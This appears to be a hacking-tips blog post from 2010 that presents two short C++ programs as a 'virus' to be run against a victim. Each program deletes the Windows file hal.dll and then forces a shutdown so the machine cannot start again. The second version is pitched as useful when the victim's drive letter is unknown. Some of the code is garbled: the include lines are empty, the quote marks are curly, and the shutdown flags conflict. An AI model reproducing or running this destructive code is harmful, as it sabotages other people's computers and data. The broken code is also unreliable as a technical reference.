This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.
Warning: Do not try this on your home computer.
The Original Code:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(“C:\\windows\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}
A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(“%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}
The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.
RSS Feed
Subscribe to our RSS Feed
Labels
- aarti (1)
- c (4)
- computer tips (22)
- DOWNLOAD (1)
- E-BOOKS (4)
- Email hacking (3)
- FILMS (5)
- full forms in computer (1)
- hacking software (1)
- hacking tips (3)
- help section (1)
- internet tips (4)
- keylogger (1)
- ladki patane k tips (1)
- mobile (2)
- mobile tips (1)
- orkut tips (2)
- portable software (1)
- Security Tips (1)
- serial keys (1)
- shortcut keys (1)
- sms flooder (1)
- softwares (16)
- tips (15)
- virus coding (8)
Sunday, August 1, 2010
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment